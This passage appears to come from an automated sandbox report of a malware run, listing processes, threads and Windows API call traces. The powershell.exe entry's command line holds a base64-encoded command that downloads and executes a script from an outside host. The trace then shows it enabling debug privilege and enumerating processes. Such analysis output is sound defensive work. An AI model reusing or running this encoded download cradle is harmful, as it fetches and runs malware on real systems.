	[0074.032] NtdllDefWindowProc_A (hWnd=0x60106, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1
	[0186.061] GetWindowLongPtrA (hWnd=0x60106, nIndex=-21) returned 0x3c5910
	[0186.061] NtdllDefWindowProc_A (hWnd=0x60106, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1
	[0186.312] GetWindowLongPtrA (hWnd=0x60106, nIndex=-21) returned 0x3c5910
	[0186.312] NtdllDefWindowProc_A (hWnd=0x60106, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1

Thread:
	id = 4
	os_tid = 0xb58


Thread:
	id = 5
	os_tid = 0xbac

	[0082.088] DllCanUnloadNow () returned 0x0
	[0082.089] free (_Block=0x3cd1e0) 

Thread:
	id = 6
	os_tid = 0x568


Thread:
	id = 7
	os_tid = 0x43c


Thread:
	id = 8
	os_tid = 0x534


Thread:
	id = 9
	os_tid = 0x70c


Thread:
	id = 10
	os_tid = 0x290


Thread:
	id = 11
	os_tid = 0x7a8


Thread:
	id = 27
	os_tid = 0x64


Thread:
	id = 76
	os_tid = 0x854


Thread:
	id = 78
	os_tid = 0x884


Thread:
	id = 79
	os_tid = 0x8b4


Thread:
	id = 91
	os_tid = 0xbc0


Thread:
	id = 93
	os_tid = 0xbc8


Thread:
	id = 106
	os_tid = 0x5e4


Thread:
	id = 108
	os_tid = 0x878


Thread:
	id = 167
	os_tid = 0x4e0


Process:
	id = "2"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x972d000"
	os_pid = "0xc8"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "1"
	os_parent_pid = "0x1d8"
	cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Local Service"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7]


Thread:
	id = 12
	os_tid = 0xa5c


Thread:
	id = 13
	os_tid = 0x5c4


Thread:
	id = 14
	os_tid = 0x768


Thread:
	id = 15
	os_tid = 0x764


Thread:
	id = 16
	os_tid = 0x758


Thread:
	id = 17
	os_tid = 0x724


Thread:
	id = 18
	os_tid = 0x718


Thread:
	id = 19
	os_tid = 0x714


Thread:
	id = 20
	os_tid = 0x630


Thread:
	id = 21
	os_tid = 0x154


Thread:
	id = 22
	os_tid = 0x150


Thread:
	id = 23
	os_tid = 0x120


Thread:
	id = 24
	os_tid = 0x124


Thread:
	id = 25
	os_tid = 0x118


Thread:
	id = 26
	os_tid = 0xf0


Thread:
	id = 122
	os_tid = 0x804


Thread:
	id = 214
	os_tid = 0x914


Process:
	id = "3"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x971d000"
	os_pid = "0x370"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "rpc_server"
	parent_id = "1"
	os_parent_pid = "0x1d8"
	cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 28
	os_tid = 0x620


Thread:
	id = 29
	os_tid = 0x644


Thread:
	id = 30
	os_tid = 0x24c


Thread:
	id = 31
	os_tid = 0x7bc


Thread:
	id = 32
	os_tid = 0x7e8


Thread:
	id = 33
	os_tid = 0x138


Thread:
	id = 34
	os_tid = 0x798


Thread:
	id = 35
	os_tid = 0x5dc


Thread:
	id = 36
	os_tid = 0x7ac


Thread:
	id = 37
	os_tid = 0x244


Thread:
	id = 38
	os_tid = 0x2c4


Thread:
	id = 39
	os_tid = 0x564


Thread:
	id = 40
	os_tid = 0x790


Thread:
	id = 41
	os_tid = 0x320


Thread:
	id = 42
	os_tid = 0x6cc


Thread:
	id = 43
	os_tid = 0x42c


Thread:
	id = 44
	os_tid = 0x1e4


Thread:
	id = 45
	os_tid = 0x760


Thread:
	id = 46
	os_tid = 0x75c


Thread:
	id = 47
	os_tid = 0x74c


Thread:
	id = 48
	os_tid = 0x710


Thread:
	id = 49
	os_tid = 0x6d0


Thread:
	id = 50
	os_tid = 0x6bc


Thread:
	id = 51
	os_tid = 0x6b8


Thread:
	id = 52
	os_tid = 0x6b0


Thread:
	id = 53
	os_tid = 0x6a8


Thread:
	id = 54
	os_tid = 0x69c


Thread:
	id = 55
	os_tid = 0x698


Thread:
	id = 56
	os_tid = 0x684


Thread:
	id = 57
	os_tid = 0x678


Thread:
	id = 58
	os_tid = 0x4a8


Thread:
	id = 59
	os_tid = 0x46c


Thread:
	id = 60
	os_tid = 0x44c


Thread:
	id = 61
	os_tid = 0x424


Thread:
	id = 62
	os_tid = 0x420


Thread:
	id = 63
	os_tid = 0x41c


Thread:
	id = 64
	os_tid = 0x404


Thread:
	id = 65
	os_tid = 0x14c


Thread:
	id = 66
	os_tid = 0x158


Thread:
	id = 67
	os_tid = 0x3fc


Thread:
	id = 68
	os_tid = 0x3f4


Thread:
	id = 69
	os_tid = 0x3e8


Thread:
	id = 70
	os_tid = 0x39c


Thread:
	id = 71
	os_tid = 0x390


Thread:
	id = 72
	os_tid = 0x38c


Thread:
	id = 73
	os_tid = 0x388


Thread:
	id = 74
	os_tid = 0x37c


Thread:
	id = 75
	os_tid = 0x374


Thread:
	id = 123
	os_tid = 0x904


Thread:
	id = 124
	os_tid = 0x924


Thread:
	id = 125
	os_tid = 0x9d4


Thread:
	id = 126
	os_tid = 0x6d8


Thread:
	id = 127
	os_tid = 0x954


Thread:
	id = 128
	os_tid = 0xbc0


Thread:
	id = 129
	os_tid = 0xbc8


Thread:
	id = 133
	os_tid = 0x748


Thread:
	id = 174
	os_tid = 0x9d4


Thread:
	id = 186
	os_tid = 0x884


Thread:
	id = 187
	os_tid = 0xa94


Thread:
	id = 188
	os_tid = 0xa84


Thread:
	id = 189
	os_tid = 0x6dc


Thread:
	id = 190
	os_tid = 0x1c4


Thread:
	id = 191
	os_tid = 0xa80


Thread:
	id = 192
	os_tid = 0x150


Thread:
	id = 193
	os_tid = 0xa8c


Thread:
	id = 194
	os_tid = 0xa90


Thread:
	id = 195
	os_tid = 0xa7c


Thread:
	id = 196
	os_tid = 0xa78


Thread:
	id = 197
	os_tid = 0x284


Thread:
	id = 198
	os_tid = 0x834


Thread:
	id = 199
	os_tid = 0x568


Thread:
	id = 202
	os_tid = 0x264


Thread:
	id = 213
	os_tid = 0xbc4


Thread:
	id = 232
	os_tid = 0xb78


Thread:
	id = 233
	os_tid = 0xa7c


Thread:
	id = 234
	os_tid = 0xb88


Thread:
	id = 290
	os_tid = 0xc60


Thread:
	id = 318
	os_tid = 0xce4


Thread:
	id = 319
	os_tid = 0xce8


Thread:
	id = 320
	os_tid = 0xcec


Thread:
	id = 321
	os_tid = 0xcf0


Thread:
	id = 322
	os_tid = 0xcf4


Thread:
	id = 323
	os_tid = 0xcf8


Thread:
	id = 324
	os_tid = 0xcfc


Thread:
	id = 325
	os_tid = 0xd00


Thread:
	id = 326
	os_tid = 0xd04


Thread:
	id = 327
	os_tid = 0xd08


Thread:
	id = 329
	os_tid = 0xd14


Thread:
	id = 353
	os_tid = 0xd9c


Thread:
	id = 354
	os_tid = 0xda0


Process:
	id = "4"
	image_name = "powershell.exe"
	filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x42415000"
	os_pid = "0x864"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x998"
	cmd_line = "\"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 77
	os_tid = 0x874

	[0086.473] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0089.238] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0089.238] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0089.239] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0089.239] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0104.340] GetVersionExW (in: lpVersionInformation=0x337c60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x337c60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.340] GetLastError () returned 0x2
	[0104.341] GetVersionExW (in: lpVersionInformation=0x337c60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x337c60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.341] GetLastError () returned 0x2
	[0104.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.477] GetLastError () returned 0x2
	[0104.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce9e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.665] GetLastError () returned 0x2
	[0104.665] GetVersionExW (in: lpVersionInformation=0x337c60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x337c60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.665] GetLastError () returned 0x2
	[0104.666] SetErrorMode (uMode=0x1) returned 0x1
	[0104.667] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcee68 | out: lpFileInformation=0xcee68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0104.667] GetLastError () returned 0x2
	[0104.667] SetErrorMode (uMode=0x1) returned 0x1
	[0104.773] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xceeec | out: lpdwHandle=0xceeec) returned 0x94c
	[0104.774] GetLastError () returned 0x0
	[0104.775] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a74f50 | out: lpData=0x2a74f50) returned 1
	[0104.900] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xceeb8, puLen=0xceeb4 | out: lplpBuffer=0xceeb8*=0x2a74fec, puLen=0xceeb4) returned 1
	[0104.902] lstrlenW (lpString="䅁") returned 1
	[0105.445] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x2a750c8, puLen=0xcee30) returned 1
	[0105.445] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0105.447] lstrcpyW (in: lpString1=0x337c48, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0105.447] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x2a7511c, puLen=0xcee30) returned 1
	[0105.447] lstrlenW (lpString="System.Management.Automation") returned 28
	[0105.447] lstrcpyW (in: lpString1=0x337c48, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0105.447] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x2a75178, puLen=0xcee30) returned 1
	[0105.447] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0105.447] lstrcpyW (in: lpString1=0x337c48, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0105.447] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x2a751b8, puLen=0xcee30) returned 1
	[0105.447] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0105.447] lstrcpyW (in: lpString1=0x337c48, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0105.447] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x2a75220, puLen=0xcee30) returned 1
	[0105.448] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0105.448] lstrcpyW (in: lpString1=0x337c48, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0105.448] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x2a752bc, puLen=0xcee30) returned 1
	[0105.448] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0105.448] lstrcpyW (in: lpString1=0x337c48, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0105.448] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x2a75320, puLen=0xcee30) returned 1
	[0105.448] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0105.448] lstrcpyW (in: lpString1=0x337c48, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0105.448] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x2a7539c, puLen=0xcee30) returned 1
	[0105.448] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0105.448] lstrcpyW (in: lpString1=0x337c48, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0105.448] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x2a75044, puLen=0xcee30) returned 1
	[0105.448] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0105.448] lstrcpyW (in: lpString1=0x337c48, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0105.448] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x0, puLen=0xcee30) returned 0
	[0105.448] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x0, puLen=0xcee30) returned 0
	[0105.448] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcee34, puLen=0xcee30 | out: lplpBuffer=0xcee34*=0x0, puLen=0xcee30) returned 0
	[0105.449] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcee28, puLen=0xcee24 | out: lplpBuffer=0xcee28*=0x2a74fec, puLen=0xcee24) returned 1
	[0105.450] VerLanguageNameW (in: wLang=0x0, szLang=0x337c48, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0105.451] VerQueryValueW (in: pBlock=0x2a74f50, lpSubBlock="\\", lplpBuffer=0xcee3c, puLen=0xcee38 | out: lplpBuffer=0xcee3c*=0x2a74f78, puLen=0xcee38) returned 1
	[0105.456] GetCurrentProcessId () returned 0x864
	[0106.255] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xce674 | out: lpLuid=0xce674*(LowPart=0x14, HighPart=0)) returned 1
	[0106.346] GetLastError () returned 0x0
	[0106.348] GetCurrentProcess () returned 0xffffffff
	[0106.348] GetLastError () returned 0x0
	[0106.350] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xce670 | out: TokenHandle=0xce670*=0x30c) returned 1
	[0106.350] GetLastError () returned 0x0
	[0106.352] AdjustTokenPrivileges (in: TokenHandle=0x30c, DisableAllPrivileges=0, NewState=0x2a77a90*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0106.352] GetLastError () returned 0x0
	[0106.354] CloseHandle (hObject=0x30c) returned 1
	[0106.354] GetLastError () returned 0x0
	[0106.569] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x864) returned 0x30c
	[0106.569] GetLastError () returned 0x0
	[0106.579] EnumProcessModules (in: hProcess=0x30c, lphModule=0x2a77ad4, cb=0x100, lpcbNeeded=0xcee64 | out: lphModule=0x2a77ad4, lpcbNeeded=0xcee64) returned 1
	[0106.580] GetLastError () returned 0x0
	[0106.692] GetModuleInformation (in: hProcess=0x30c, hModule=0x221d0000, lpmodinfo=0x2a77c14, cb=0xc | out: lpmodinfo=0x2a77c14*(lpBaseOfDll=0x221d0000, SizeOfImage=0x72000, EntryPoint=0x221d7363)) returned 1
	[0106.693] GetLastError () returned 0x0
	[0106.696] GetModuleBaseNameW (in: hProcess=0x30c, hModule=0x221d0000, lpBaseName=0x338408, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0106.696] GetLastError () returned 0x0
	[0106.698] GetModuleFileNameExW (in: hProcess=0x30c, hModule=0x221d0000, lpFilename=0x338408, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0106.698] GetLastError () returned 0x0
	[0106.699] CloseHandle (hObject=0x30c) returned 1
	[0106.699] GetLastError () returned 0x0
	[0107.066] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x864) returned 0x30c
	[0107.066] GetLastError () returned 0x0
	[0107.068] GetExitCodeProcess (in: hProcess=0x30c, lpExitCode=0x2a770c4 | out: lpExitCode=0x2a770c4*=0x103) returned 1
	[0107.069] GetLastError () returned 0x0
	[0107.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3a75278, Length=0x20000, ResultLength=0xceeac | out: SystemInformation=0x3a75278, ResultLength=0xceeac*=0xeab8) returned 0x0
	[0107.636] EnumWindows (lpEnumFunc=0x2a33612, lParam=0x0) returned 1
	[0107.638] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.639] GetLastError () returned 0x0
	[0107.639] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.639] GetLastError () returned 0x0
	[0107.639] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.639] GetLastError () returned 0x0
	[0107.639] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.639] GetLastError () returned 0x0
	[0107.639] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.639] GetLastError () returned 0x0
	[0107.639] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.639] GetLastError () returned 0x0
	[0107.640] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.640] GetLastError () returned 0x0
	[0107.640] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.640] GetLastError () returned 0x0
	[0107.640] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.640] GetLastError () returned 0x0
	[0107.640] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x538
	[0107.640] GetLastError () returned 0x0
	[0107.640] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.640] GetLastError () returned 0x0
	[0107.640] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.640] GetLastError () returned 0x0
	[0107.641] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.641] GetLastError () returned 0x0
	[0107.641] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x514
	[0107.641] GetLastError () returned 0x0
	[0107.641] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.641] GetLastError () returned 0x0
	[0107.641] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x778
	[0107.641] GetLastError () returned 0x0
	[0107.642] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x778
	[0107.642] GetLastError () returned 0x0
	[0107.642] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.642] GetLastError () returned 0x0
	[0107.642] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x458
	[0107.642] GetLastError () returned 0x0
	[0107.642] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4ac
	[0107.642] GetLastError () returned 0x0
	[0107.642] GetWindowThreadProcessId (in: hWnd=0xa0266, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0xa18
	[0107.642] GetLastError () returned 0x0
	[0107.642] GetWindowThreadProcessId (in: hWnd=0x14017c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x978
	[0107.642] GetLastError () returned 0x0
	[0107.642] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x838
	[0107.643] GetLastError () returned 0x0
	[0107.643] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0xb2c
	[0107.643] GetLastError () returned 0x0
	[0107.643] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x8d4
	[0107.643] GetLastError () returned 0x0
